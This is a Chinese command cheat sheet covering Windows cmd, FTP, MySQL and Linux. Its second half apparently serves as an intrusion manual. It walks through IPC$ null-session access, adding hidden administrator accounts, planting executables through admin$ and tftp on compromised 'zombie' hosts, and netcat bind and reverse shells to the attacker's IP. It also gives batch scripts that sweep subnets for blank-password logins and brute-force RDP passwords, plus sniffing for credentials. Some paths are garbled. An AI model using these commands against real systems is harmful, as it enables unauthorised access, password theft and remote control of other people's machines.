Windows和Linux簡單命令的總結

MS-DOS

命令提示符（cmd)

• 啓動：                      Win+R，輸入cmd回車
• 切換盤符       　　    盤符名稱：
• 進入文件夾              cd 文件夾名稱
• 進入多級文件夾       cd 文件夾1/文件夾2/文件夾3
• 返回上一級              cd ..
• 直接回跟路徑          cd /
• 查看當前內容          dir
• 清屏                        cls
• 退出                        exit

 

CMD命令

cmd是command的縮寫.即命令提示符（CMD），是在OS / 2 ， Windows CE與Windows NT平臺爲基礎的操做系統（包括Windows 2000和XP中， Vista中，和Server 2003 ）下的「MS-DOS 方式」。中文版Windows XP 中的命令提示符進一步提升了與DOS 下操做命令的兼容性，用戶能夠在命令提示符直接輸入中文調用文件。

命令做用

在9x系統下輸入command就能夠打開命令行.而在NT系統上能夠輸入cmd來打開，在windows2000後被cmd替代，利用CMD命令查詢系統的信息或者是判斷網絡的好壞。

運行操做

CMD命令：開始－>運行－>鍵入cmd或command（在命令行裏能夠看到系統版本、文件系統版本）

命令大全

1. calc-----------啓動計算器
2.certmgr.msc----證書管理實用程序
3.charmap--------啓動字符映射表
5. chkdsk.exe-----Chkdsk磁盤檢查
6. ciadv.msc------索引服務程序
7. cleanmgr-------垃圾整理
8. cliconfg-------SQL SERVER 客戶端網絡實用程序
9. Clipbrd--------剪貼板查看器
10. cmd.exe--------CMD命令提示符
11. compmgmt.msc---計算機管理
12. conf-----------啓動netmeeting
13. dcomcnfg-------打開系統組件服務
14. ddeshare-------打開DDE共享設置
15. devmgmt.msc--- 設備管理器
16. dfrg.msc-------磁盤碎片整理程序
17. diskmgmt.msc---磁盤管理實用程序
18. drwtsn32------ 系統醫生
19. dvdplay--------DVD播放器
20. dxdiag---------檢查DirectX信息
21. explorer-------打開資源管理器
22. eudcedit-------造字程序
23. eventvwr-------事件查看器
24. fsmgmt.msc-----共享文件夾管理器
25. gpedit.msc-----組策略
26. iexpress-------木馬捆綁工具，系統自帶
27. logoff---------註銷命令
28. lusrmgr.msc----本機用戶和組
29. notepad--------打開記事本
30. magnify--------放大鏡實用程序
31. mem.exe--------顯示內存使用狀況
32. mmc------------打開控制檯49.
33. mobsync--------同步命令
34.mplayer2-------簡易widnows media player
35. Msconfig.exe---系統配置實用程序
36. mspaint--------畫圖板
37. mstsc----------遠程桌面鏈接
38. narrator-------屏幕「講述人」
39. net start messenger----開始信使服務
40. netstat -an----(TC)命令檢查接口
41. net stop messenger-----中止信使服務
42. Nslookup-------IP地址偵測器 ，是一個監測網絡中 DNS 服務器是否能正確實現域名解析的命令行工具.
它在Windows NT/2000/XP中都可使用，但在 Windows 98 中卻沒有集成這一個工具。
43. ntbackup-------系統備份和還原
44. ntmsmgr.msc----移動存儲管理器
45. ntmsoprq.msc---移動存儲管理員操做請求
46. odbcad32-------ODBC數據源管理器
47. oobe/msoobe /a----檢查XP是否激活
48. osk------------打開屏幕鍵盤
49. packager-------對象包裝程序
50. perfmon.msc----計算機性能監測程序
51. progman--------程序管理器
52. regedit.exe----註冊表
53. regedt32-------註冊表編輯器
54. regsvr32 /u *.dll----中止dll文件運行
55. regsvr32 /u zipfldr.dll------取消ZIP支持
56. rononce -p----15秒關機
57. rsop.msc-------組策略結果集
58. secpol.msc-----本地安全策略
59. services.msc---本地服務設置
60. sfc.exe--------系統文件檢查器
61 sfc /scannow-----掃描錯誤並復原
62. sfc /scannow---windows文件保護
63. shrpubw--------建立共享文件夾
64. shutdown-------60秒倒計時關機命令
65. sigverif-------文件簽名驗證程序
66. sndrec32-------錄音機
67. Sndvol32-------音量控制程序
68. syncapp--------建立一個公文包
69. sysedit--------系統配置編輯器
70. syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼
71. taskmgr--------任務管理器
72. tourstart------xp簡介（安裝完成後出現的漫遊xp程序）
73. utilman--------輔助工具管理器
74. wiaacmgr-------掃描儀和照相機嚮導
75. winchat--------XP自帶局域網聊天
76. winmsd---------系統信息
77. winver---------檢查Windows版本
78. write----------寫字板
79. wmimgmt.msc----打開windows管理體系結構（WMI)
80. wscript--------windows腳本宿主設置
81. wupdmgr--------windows更新程序

操做詳解

1. net use ipipc$ " " /user:" " 創建IPC空連接
2. net use ipipc$ "密碼" /user:"用戶名" 創建IPC非空連接
3. net use h: ipc$ "密碼" /user:"用戶名" 直接登錄後映射對方C：到本地爲H:
4. net use h: ipc$ 登錄後映射對方C：到本地爲H:
5. net use ipipc$ /del 刪除IPC連接
6. net use h: /del 刪除映射對方到本地的爲H：的映射
7. net user 用戶名　密碼　/add 創建用戶
8. net user guest /active:yes 激活guest用戶
9. net user 查看有哪些用戶
10. net user 賬戶名 查看賬戶的屬性
11. net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具備管理員權限
12. net start 查看開啓了哪些服務
13. net start 服務名　開啓服務；（如：net start telnet， net start schedule)
14. net stop 服務名 中止某服務
15. net time 目標ip 查看對方時間
16. net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步，加上參數/yes可取消確認信息
17. net view 查看本地局域網內開啓了哪些共享
18. net view ip 查看對方局域網內開啓了哪些共享
19. net config 顯示系統網絡設置
20. net logoff 斷開鏈接的共享
21. net pause 服務名 暫停某服務
22. net send ip "文本信息" 向對方發信息
23. net ver 局域網內正在使用的網絡鏈接類型和信息
24. net share 查看本地開啓的共享
25. net share ipc開啓ipc共享
26. net share ipc/del刪除ipc共享
27. net share c$ /del 刪除C：共享
28. net user guest 12345 用guest用戶登錄後用將密碼改成12345
29. net password 密碼 更改系統登錄密碼
30. netstat -a 查看開啓了哪些端口，經常使用netstat -an
31. netstat -n 查看端口的網絡鏈接狀況，經常使用netstat -an
32. netstat -v 查看正在進行的工做
33. netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用狀況
34. netstat -s 查看正在使用的全部協議使用狀況
35. nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登錄的用戶名
36. tracert -參數 ip(或計算機名） 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
37. ping ip（或域名） 向對方主機發送默認大小爲32字節的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
38. ping -t -l 65500 ip 死亡之ping（發送大於64K的文件並一直ping就成了死亡之ping)
39. ipconfig (winipcfg) 用於windows NT及XP(windows 95 98）查看本地ip地址，ipconfig可用參數「/all」顯示所有配置信息
40. tlist -t 以樹行列表顯示進程（爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內）
41. kill -F 進程名 加-F參數後強制結束某進程（爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內）
42. del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR *.*」表示刪除當前目錄下全部只讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件之外的全部文件
43. del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的全部子目錄和文件。同時使用參數/Q 可取消刪除操做時的系統確認就直接刪除。（二個命令做用相同）
44. move 盤符路徑要移動的文件名　存放移動文件的路徑移動後文件名 移動文件，用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
45. fc one.txt two.txt > 3st.txt 對比二個文件並把不一樣之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
46. at id號 開啓已註冊的某個計劃任務
47. at /delete 中止全部計劃任務，用參數/yes則不須要確認就直接中止
48. at id號 /delete 中止某個已註冊的計劃任務
49. at 查看全部的計劃任務
50. at ip time 程序名（或一個命令） /r 在某時間運行對方某程序並從新啓動計算機
51. finger username @host 查看最近有哪些用戶登錄
52. telnet ip 端口 遠程登錄服務器，默認端口爲23
53. open ip 鏈接到IP（屬telnet登錄後的命令）
54. telnet 在本機上直接鍵入telnet 將進入本機的telnet
55. copy 路徑文件名1　路徑文件名2 /y 複製文件1到指定的目錄爲文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
56. copy c:srv.exe ipadmin$ 複製本地c:srv.exe到對方的admin下
57. copy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
58. copy ipadminsvv.exec:或：copyipadmin*.* 複製對方admini$共享下的srv.exe文件（全部文件）至本地C：
59. xcopy 要複製的文件或目錄樹　目標地址目錄名 複製文件和目錄樹，用參數/Y將不提示覆蓋相同文件，用參數/e纔可連目錄下的子目錄一塊兒複製到目標地址下。 
60. tftp -i 本身IP（用肉機做跳板時這用肉機IP) get server.exec:server.exe 登錄後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
61. tftp -i 對方IP　put c:server.exe 登錄後，上傳本地c:server.exe至主機
62. ftp ip 端口 用於上傳文件至服務器或進行文件操做，默認端口爲21。bin指用二進制方式傳送（可執行文件進）；默認爲ASCII格式傳送（文本文件時）
63. route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface
64. arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出所有信息
65. start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
66. mem 查看cpu使用狀況
67. attrib 文件名（目錄名） 查看某文件（目錄）的屬性
68. attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉（添加）某文件的 存檔，只讀，系統，隱藏 屬性；用+則是添加爲某屬性
69. dir 查看文件，參數：/Q顯示文件及目錄屬系統哪一個用戶，/T:C顯示文件建立時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
70. date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而沒必要輸入新日期和時間
71. set 指定環境變量名稱=要指派給變量的字符 設置環境變量
72. set 顯示當前全部的環境變量
73. set p（或其它字符） 顯示出當前以字符p（或其它字符）開頭的全部環境變量
74. pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
75. if 在批處理程序中執行條件處理（更多說明見if命令及變量）
76. goto 標籤 將cmd.exe導向到批處理程序中帶標籤的行（標籤必須單獨一行，且以冒號打頭，例如：「：start」標籤）
77. call 路徑批處理文件名 從批處理程序中調用另外一個批處理程序 （更多說明見call /?）
78. for 對一組文件中的每個文件執行某個特定命令（更多說明見for命令及變量）
79. echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
80. echo 信息 在屏幕上顯示出信息
81. echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
82. findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello
83. find 文件名 查找某文件
84. title 標題名字 更改CMD窗口標題名字
85. color 顏色值 設置cmd控制檯前景和背景顏色；0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
86. prompt 名稱 更改cmd.exe的顯示的命令提示符（把C：、D：統一改成：EntSky )
87. ver 在DOS窗口下顯示版本信息
88. winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
89. format 盤符 /FS：類型 格式化磁盤，類型：FAT、FAT3二、NTFS,例：Format D: /FS:NTFS
90. md　目錄名 建立目錄
91. replace 源文件　要替換文件的目錄 替換文件
92. ren 原文件名　新文件名 重命名文件名
93. tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
94. type 文件名 顯示文本文件的內容
95. more 文件名 逐屏顯示輸出文件
96. doskey 要鎖定的命令=字符
97. doskey 要解鎖命令= 爲DOS提供的鎖定命令（編輯命令行，從新調用win2k命令，並建立宏）。如：鎖定dir命令：doskey dir=entsky （不能用doskey dir=dir）；解鎖：doskey dir=
98. taskmgr 調出任務管理器
99. chkdsk /F D: 檢查磁盤D並顯示狀態報告；加參數/f並修復磁盤上的錯誤
100. tlntadmn telnt服務admn，鍵入tlntadmn選擇3，再選擇8，就能夠更改telnet服務默認端口23爲其它任何端口
101. exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
102. path 路徑可執行文件的文件名 爲可執行文件設置一個路徑。
103. cmd 啓動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啓命令擴展；更我詳細說明見cmd /?
104. regedit /s 註冊表文件名 導入註冊表；參數/S指安靜模式導入，無任何提示；
105. regedit /e 註冊表文件名 導出註冊表
106. cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名：設定拒絕某用戶訪問；/P 用戶名：perm 替換指定用戶的訪問權限；/G 用戶名：perm 賦予指定用戶訪問權限；Perm 能夠是： N 無，R 讀取， W 寫入， C 更改（寫入），F 徹底控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
107. cacls 文件名 查看文件的訪問用戶權限列表
108. REM 文本內容 在批處理文件中添加註解
109. netsh 查看或更改本地網絡配置狀況

IIS服務命令

1. iisreset /reboot 重啓win2k計算機（但有提示系統將重啓信息出現）
2. iisreset /start或stop 啓動（中止）全部Internet服務
3. iisreset /restart 中止而後從新啓動全部Internet服務
4. iisreset /status 顯示全部Internet服務狀態
5. iisreset /enable或disable 在本地系統上啓用（禁用）Internet服務的從新啓動
6. iisreset /rebootonerror 當啓動、中止或從新啓動Internet服務時，若發生錯誤將從新開機
7. iisreset /noforce 若沒法中止Internet服務，將不會強制終止Internet服務
8. iisreset /timeout Val在到達逾時間（秒）時，仍未中止Internet服務，若指定/rebootonerror參數，則電腦將會從新開機。預設值爲從新啓動20秒，中止60秒，從新開機0秒。
9. FTP 命令：（後面有詳細說明內容）

ftp的命令行格式爲：

1. ftp －v －d －i －n －g[主機名] －v 顯示遠程服務器的全部響應信息。
2. －d 使用調試方式。
3. －n 限制ftp的自動登陸，即不使用.netrc文件。
4. －g 取消全局文件名。
5. help [命令] 或 ？[命令] 查看命令說明
6. bye 或 quit 終止主機FTP進程，並退出FTP管理方式.
7. pwd 列出當前遠端主機目錄
8. put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
9. get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
10. mget [remote-files] 從遠端主機接收一批文件至本地主機
11. mput local-files 將本地主機中一批文件傳送至遠端主機
12. dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.若是有本地文件，就將結果寫至本地文件
13. ascii 設定以ASCII方式傳送文件（缺省值）
14. bin 或 image 設定以二進制方式傳送文件
15. bell 每完成一次文件傳送，報警提示
16. cdup 返回上一級目錄
17. close 中斷與遠程服務器的ftp會話（與open對應）
18. open host[port] 創建指定ftp服務器鏈接，可指定鏈接端口
19. delete 刪除遠端主機中的文件
20. mdelete [remote-files] 刪除一批文件
21. mkdir directory-name 在遠端主機中創建目錄
22. rename [from] [to] 改變遠端主機中的文件名
23. rmdir directory-name 刪除遠端主機中的目錄
24. status 顯示當前FTP的狀態
25. system 顯示遠端主機系統類型
26. user user-name [password] [account] 從新以別的用戶名登陸遠端主機
27. open host [port] 從新創建一個新的鏈接
28. prompt 交互提示模式
29. macdef 定義宏命令
30. lcd 改變當前本地主機的工做目錄，若是缺省，就轉到當前用戶的HOME目錄
31. chmod 改變遠端主機的文件權限
32. case 當爲ON時，用MGET命令拷貝的文件名到本地機器中，所有轉換爲小寫字母
33. cd remote－dir 進入遠程主機目錄
34. cdup 進入遠程主機目錄的父目錄
35. ! 在本地機中執行交互shell，exit回到ftp環境，如!ls*.zip

MYSQL 命令

mysql -h主機地址 -u用戶名 －p密碼 鏈接MYSQL；若是剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注：u與root能夠不用加空格，其它也同樣）

1. exit 退出MYSQL
2. mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
3. grant select on 數據庫.* to 用戶名@登陸主機 identified by "密碼"; 增長新用戶。（注意：和上面不一樣，下面的由於是MYSQL環境中的命令，因此後面都帶一個分號做爲命令結束符）
4. show databases; 顯示數據庫列表。剛開始時才兩個數據庫：mysql和test。mysql庫很重要它裏面有MYSQL的系統信息，咱們改密碼和新增用戶，實際上就是用這個庫進行操做。
5. use mysql；
6. show tables; 顯示庫中的數據表
7. describe 表名； 顯示數據表的結構
8. create database 庫名； 建庫
9. use 庫名；
10. create table 表名 （字段設定列表）； 建表
11. drop database 庫名；
12. drop table 表名； 刪庫和刪表
13. delete from 表名； 將表中記錄清空
14. select * from 表名； 顯示錶中的記錄
15. mysqldump --opt school>school.bbb 備份數據庫：（命令在DOS的mysqlin目錄下執行）；註釋：將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。

win2003系統下新增命令（實用部份）：

• shutdown /參數 關閉或重啓本地或遠程主機。

參數說明：/S 關閉主機，/R 重啓主機， /T 數字 設定延時的時間，範圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 當即重啓本地主機（無延時）

• taskkill /參數 進程名或進程的pid 終止一個或多個任務和進程。

參數說明：/PID 要終止進程的pid，可用tasklist命令得到各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啓動的子進程。

• tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID）。

參數說明：/M 列出當前進程加載的dll文件，/SVC 顯示出每一個進程對應的服務，無參數時就只列出當前的進程。

Linux系統下基本命令

　注：要區分大小寫

1. uname 顯示版本信息（同win2K的 ver）
2. dir 顯示當前目錄文件，ls -al 顯示包括隱藏文件（同win2K的 dir）
3. pwd 查詢當前所在的目錄位置
4. cd cd　..回到上一層目錄，注意cd 與..之間有空格。cd　/返回到根目錄。
5. cat 文件名 查看文件內容
6. cat >abc.txt 往abc.txt文件中寫上內容。
7. more 文件名 以一頁一頁的方式顯示一個文本文件。
8. cp 複製文件
9. mv 移動文件
10. rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
11. mkdir 目錄名 創建目錄
12. rmdir 刪除子目錄，目錄內沒有文檔。
13. chmod 設定檔案或目錄的存取權限
14. grep 在檔案中查找字符串
15. diff 檔案文件比較
16. find 檔案搜尋
17. date 如今的日期、時間
18. who 查詢目前和你使用同一臺機器的人以及Login時間地點
19. w 查詢目前上機者的詳細資料
20. whoami 查看本身的賬號名稱
21. groups 查看某人的Group
22. passwd 更改密碼
23. history 查看本身下過的命令
24. ps 顯示進程狀態
25. kill 中止某進程
26. gcc 黑客一般用它來編譯C語言寫的文件
27. su 權限轉換爲指定使用者
28. telnet IP telnet鏈接對方主機（同win2K），當出現bash$時就說明鏈接成功。
29. ftp ftp鏈接上某服務器（同win2K）

批處理命令與變量

1：for命令及變量 基本格式
FOR /參數 %variable IN (set) DO command [command_parameters] %variable：指定一個單一字母可替換的參數，如：%i ，而指定一個變量則用：%%i ，而調用變量時用：%i% ，變量是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變量從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認爲使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use ipipc$ pass /user:user 中ip爲%1,pass爲%2,user爲%3

• (set）：指定一個或一組文件，可以使用通配符，如：（D:user.txt）和（1 1 254)(1 -1 254),{ 「（1 1 254）」第一個"1"指起始值，第二個"1"指增加量，第三個"254"指結束值，即：從1到254；「（1 -1 254）」說明：即從254到1 }
• command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
• command_parameters：爲特定命令指定參數或命令行開關
• IN (set）：指在（set）中取值；DO command ：指執行command
• 參數：/L 指用增量形式{ (set）爲增量形式時 }；/F 指從文件中不斷取值，直到取完爲止{ (set）爲文件時，如（d:pass.txt）時 }。

用法舉例：
@echo off

• echo 用法格式：test.bat *.*.* > test.txt
• for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
• 存爲test.bat 說明：對指定的一個C類網段的254個IP依次試創建administrator密碼爲空的IPC$鏈接，若是成功就把該IP存在test.txt中。
• /L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*爲批處理默認的 %1；%%G 爲變量（ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指創建了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 爲完整的IP地址；（1 1 254) 指起始值，增加量，結止值。

@echo off

• echo 用法格式：ok.bat ip
• FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
• 存爲：ok.exe 說明：輸入一個IP後，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完爲止。%%i爲用戶名；%1爲輸入的IP地址（默認）。

2：if命令及變量 基本格式
IF [not] errorlevel 數字 命令語句 若是程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件爲「真」。

• 例：IF errorlevel 0 命令 指程序執行後返回的值爲0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。

0 指發現併成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字符串1==字符串2 命令語句 若是指定的文本字符串匹配（即：字符串1 等於 字符串2），就執行後面的命令。

• 例：「if "%2%"=="4" goto start」指：若是輸入的第二個變量爲4時，執行後面的命令（注意：調用變量時就%變量名%並加" "）

IF [not] exist 文件名 命令語句 若是指定的文件名存在，就執行後面的命令。

• 例：「if not nc.exe goto end」指：若是沒有發現nc.exe文件就跳到":end"標籤處。

IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行纔有效。當有del命令時需把del命令所有內容用< >括起來，由於del命令要單獨一行時才能執行，用上< >後就等因而單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

系統外部命令

注：系統外部命令（均需下載相關工具）
瑞士軍刀：nc.exe
參數說明：

• -h 查看幫助信息
• -d 後臺模式
• -e prog程序重定向，一但鏈接就執行[危險]
• -i secs延時的間隔
• -l 監聽模式，用於入站鏈接
• -L 監聽模式，鏈接天閉後仍然繼續監聽，直到CTR+C
• -n IP地址，不能用域名
• -o film記錄16進制的傳輸
• -p[空格]端口 本地端口號
• -r 隨機本地及遠程端口
• -t 使用Telnet交互方式
• -u UDP模式
• -v 詳細輸出，用-vv將更詳細
• -w數字 timeout延時間隔
• -z 將輸入，輸出關掉（用於掃錨時）

基本用法：

• nc -nvv 192.168.0.1 80 鏈接到192.168.0.1主機的80端口
• nc -l -p 80 開啓本機的TCP 80端口並監聽
• nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口
• nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口
• nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向鏈接192.168.0.2的5354端口

高級用法：

• nc -L -p 80 做爲蜜罐用1：開啓並不停地監聽80端口，直到CTR+C爲止
• nc -L -p 80 > c:log.txt 做爲蜜罐用2：開啓並不停地監聽80端口，直到CTR+C，同時把結果輸出到c:log.txt
• nc -L -p 80 < c:honeyport.txt 做爲蜜罐用3-1：開啓並不停地監聽80端口，直到CTR+C，並把c:honeyport.txt中內容送入管道中，亦可起到傳送文件做用
• type.exe c:honeyport | nc -L -p 80 做爲蜜罐用3-2：開啓並不停地監聽80端口，直到CTR+C，並把c:honeyport.txt中內容送入管道中，亦可起到傳送文件做用
• 本機上用：nc -l -p 本機端口
• 在對方主機上用：nc -e cmd.exe 本機IP -p 本機端口 *win2K
• nc -e /bin/sh 本機IP -p 本機端口 *linux,unix 反向鏈接突破對方主機的防火牆
• 本機上用：nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
• 在對方主機上用：nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機

備 注：
| 管道命令

• < 或 > 重定向命令。「<；」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
• @ 表示執行@後面的命令，但不會顯示出來（後臺執行）；例：@dir c:winnt >> d:log.txt 意思是：後臺執行dir，並把結果存在d:log.txt中
• >與>>的區別 ">"指：覆蓋；">>"指：保存到（添加到）。

如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是由於第二次的結果把第一次的覆蓋了。

掃描工具：xscan.exe

基本格式
xscan -host <；起始IP>[-<；終止IP>] <；檢測項目> [其餘選項] 掃錨"起始IP到終止IP"段的全部主機信息
xscan -file <；主機列表文件名> <；檢測項目> [其餘選項] 掃錨"主機IP列表文件名"中的全部主機信息
檢測項目

• -active 檢測主機是否存活
• -os 檢測遠程操做系統類型（經過NETBIOS和SNMP協議）
• -port 檢測經常使用服務的端口狀態
• -ftp 檢測FTP弱口令
• -pub 檢測FTP服務匿名用戶寫權限
• -pop3 檢測POP3-Server弱口令
• -smtp 檢測SMTP-Server漏洞
• -sql 檢測SQL-Server弱口令
• -smb 檢測NT-Server弱口令
• -iis 檢測IIS編碼/解碼漏洞
• -cgi 檢測CGI漏洞
• -nasl 加載Nessus攻擊腳本
• -all 檢測以上全部項目

其它選項

• -i 適配器編號 設置網絡適配器，<；適配器編號>可經過"-l"參數獲取
• -l 顯示全部網絡適配器
• -v 顯示詳細掃描進度
• -p 跳過沒有響應的主機
• -o 跳過沒有檢測到開放端口的主機
• -t 併發線程數量，併發主機數量 指定最大併發線程數量和併發主機數量，默認數量爲100,10
• -log 文件名 指定掃描報告文件名 （後綴爲：TXT或HTML格式的文件）

用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p　檢測192.168.1.1-192.168.255.255網段內主機的全部漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標準端口狀態，NT弱口令用戶，最大併發線程數量爲150，跳過沒有檢測到開放端口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的全部主機的標準端口狀態，CGI漏洞，最大併發線程數量爲200，同一時刻最多檢測5臺主機，顯示詳細檢測進度，跳過沒有檢測到開放端口的主機

命令行方式嗅探器： xsniff.exe

可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明

• -tcp 輸出TCP數據報
• -udp 輸出UDP數據報
• -icmp 輸出ICMP數據報
• -pass 過濾密碼信息
• -hide 後臺運行
• -host 解析主機名
• -addr IP地址 過濾IP地址
• -port 端口 過濾端口
• -log 文件名 將輸出保存到文件
• -asc 以ASCII形式輸出
• -hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後臺運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

終端服務密碼破解： tscrack.exe

參數說明

• -h 顯示使用幫助
• -v 顯示版本信息
• -s 在屏幕上打出解密能力
• -b 密碼錯誤時發出的聲音
• -t 同是發出多個鏈接（多線程）
• -N Prevent System Log entries on targeted server
• -U 卸載移除tscrack組件
• -f 使用－f後面的密碼
• -F 間隔時間（頻率）
• -l 使用－l後面的用戶名
• -w 使用－w後面的密碼字典
• -p 使用－p後面的密碼
• -D 登陸主頁面

用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登錄密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登錄192.168.0.1的administrator用戶

• @if not exist ipcscan.txt goto noscan
• @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

• @echo 3389.txt no find or scan faild

（①存爲3389.bat) （假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是：從3389.txt文件中取一個IP，接着運行hack.bat

• @if not exist tscrack.exe goto noscan
• @tscrack %1 -l administrator -w pass.dic >>rouji.txt

:noscan

• @echo tscrack.exe no find or scan faild

（②存爲hack.bat) （運行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下；就能夠等待結果了）
hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中全部主機的administrator密碼，並將破解結果保存在rouji.txt文件中。

其它

• Shutdown.exe
• Shutdown IP地址 t:20 20秒後將對方NT自動關閉（Windows 2003系統自帶工具，在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。）
• fpipe.exe (TCP端口重定向工具） 在第二篇中有詳細說明（端口重定向繞過防火牆）
• fpipe -l 80 -s 1029 -r 80 當有人掃錨你的80端口時，他掃到的結果會徹底是的主機信息
• Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23端口Telnet請求經端口重定向後，就經過88端口發送到目標IP的23端口。（與目標IP創建Telnet時本機就用的88端口與其相鏈接）而後：直接Telnet 127.0.0.1（本機IP）就鏈接到目標IP的23端口了。
• OpenTelnet.exe （遠程開啓telnet工具）
• opentelnet.exe IP 賬號　密碼　ntlm認證方式　Telnet端口 （不須要上傳ntlm.exe破壞微軟的身份驗證方式）直接遠程開啓對方的telnet服務後，就可用telnet ip 鏈接上對方。
